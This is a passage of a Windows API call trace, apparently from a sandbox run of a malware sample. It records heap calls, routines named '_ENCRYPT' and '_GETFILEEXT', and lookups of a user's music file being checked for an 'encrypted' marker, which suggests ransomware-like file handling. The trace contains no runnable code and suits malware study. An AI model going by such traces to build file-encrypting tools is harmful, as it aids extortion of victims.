RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0037.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9b8 [0037.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c9b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0037.811] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.811] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0037.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0037.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.812] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0037.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0037.812] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.812] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0037.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0037.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0037.812] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.812] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0037.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0037.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0037.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.812] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0037.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0037.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0037.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0037.812] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0037.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0037.812] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0037.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0037.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0037.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0037.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0037.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0037.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.813] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7a885f0, ftCreationTime.dwHighDateTime=0x1d5bfd6, ftLastAccessTime.dwLowDateTime=0xf32dd8d0, ftLastAccessTime.dwHighDateTime=0x1d5c53e, ftLastWriteTime.dwLowDateTime=0xf32dd8d0, ftLastWriteTime.dwHighDateTime=0x1d5c53e, nFileSizeHigh=0x0, nFileSizeLow=0x2ddd, dwReserved0=0x0, dwReserved1=0x777648, cFileName="z7Rh4U-493ioKt.m4a", cAlternateFileName="Z7RH4U~1.M4A")) returned 0x7c20c0 [0037.813] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0037.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0037.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0037.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0037.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0037.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0037.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0037.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0037.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0037.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0037.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0037.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0037.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0037.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0037.814] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0037.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0037.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0037.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0037.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.814] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7a885f0, ftCreationTime.dwHighDateTime=0x1d5bfd6, ftLastAccessTime.dwLowDateTime=0xf32dd8d0, ftLastAccessTime.dwHighDateTime=0x1d5c53e, ftLastWriteTime.dwLowDateTime=0xf32dd8d0, ftLastWriteTime.dwHighDateTime=0x1d5c53e, nFileSizeHigh=0x0, nFileSizeLow=0x2ddd, dwReserved0=0x0, dwReserved1=0x777648, cFileName="z7Rh4U-493ioKt.m4a", cAlternateFileName="Z7RH4U~1.M4A")) returned 0x7c20c0 [0037.814] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0037.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0037.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0037.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0037.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0037.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0037.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0037.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.815] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0037.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0037.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="68KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ILlni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Llni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rh4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="493ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="93ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ioKt.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0037.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0037.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.817] HeapFree (in: 